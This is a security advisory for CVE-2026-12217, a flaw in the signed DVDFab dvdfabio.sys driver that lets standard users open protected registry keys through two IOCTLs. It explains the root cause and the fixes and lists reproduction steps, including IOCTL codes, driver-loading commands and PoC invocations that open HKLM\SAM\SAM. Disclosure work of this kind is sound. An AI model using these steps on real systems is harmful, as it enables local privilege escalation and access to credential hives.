CVE-2026-12217

A local attacker with only standard-user privileges opens the `\\.\DVDFabIO` device and sends IOCTL `0x222410` or `0x22240C` with a native registry path such as `\Registry\Machine\SAM\SAM`. Because the driver opens the key from kernel mode without performing Windows access checks for the caller, the attacker receives a usable handle to a protected HKLM key. The attacker can then write to protected registry values or read sensitive hives, achieving local privilege escalation [ref_id=1]. No network access or additional authentication is required beyond the ability to load the driver and execute user-mode code.

The signed kernel driver `dvdfabio.sys` (version 1.5.1.0) shipped with DVDFab Virtual Drive 2.0.0.5 exposes the device `\\.\DVDFabIO`. The driver implements IOCTLs `0x222410` (ZwOpenKey) and `0x22240C` (ZwCreateKey) that open or create caller-selected native registry paths from kernel context without enforcing the caller's normal registry access checks [ref_id=1]. The returned registry handle is inserted directly into the caller's process handle table.

The bundle does not contain an official vendor patch. The advisory recommends removing the registry open/create IOCTLs from the public device interface, restricting the `\\.\DVDFabIO` device ACL so standard users cannot open it, and never returning kernel-opened object handles to untrusted callers [ref_id=1]. If registry access is required, the driver should impersonate the caller and enforce normal access checks before opening the registry object, or restrict registry helpers to a strict allowlist of vendor-owned keys.

## Reproduction steps (from advisory [ref_id=1])

1. Extract the driver: `7z.exe x dvdfab_virtual_drive_x64_2005.exe dvdfabio.sys -oC:\ProgramData\VendorRepro\dvdfabio_extract -y` 2. Load the driver under a temporary service: ``` sc.exe create DVDFabIORepro type= kernel start= demand binPath= C:\ProgramData\VendorRepro\dvdfabio_extract\dvdfabio.sys sc.exe start DVDFabIORepro ``` 3. As administrator, create a protected test key: ``` New-Item -Path HKLM:\SOFTWARE\VendorRepro\DVDFabIO -Force | Out-Null New-ItemProperty -Path HKLM:\SOFTWARE\VendorRepro\DVDFabIO -Name Guard -Value before -PropertyType String -Force | Out-Null ``` 4. As a **standard user**, confirm direct access is denied: ``` reg add HKLM\SOFTWARE\VendorRepro\DVDFabIO /v DriverWritten /t REG_SZ /d SHOULD-NOT-WRITE /f → ERROR: Access is denied. reg query HKLM\SAM\SAM → ERROR: Access is denied. ``` 5. As the same standard user, write through the driver IOCTL: ``` dvdfabio_registry_setvalue_poc.exe --key \Registry\Machine\SOFTWARE\VendorRepro\DVDFabIO --value DriverWritten --data DVDFABIO-REGISTRY-HANDLE-WRITE-... ``` Confirm the value was written. 6. As the same standard user, open HKLM\SAM\SAM through the driver: ``` dvdfabio_registry_handle_poc.exe \Registry\Machine\SAM\SAM 0x00020019 ``` Expected output: `NtQueryKey succeeded. Final key component: SAM` 7. Cleanup: remove test keys, stop and delete the temporary driver service.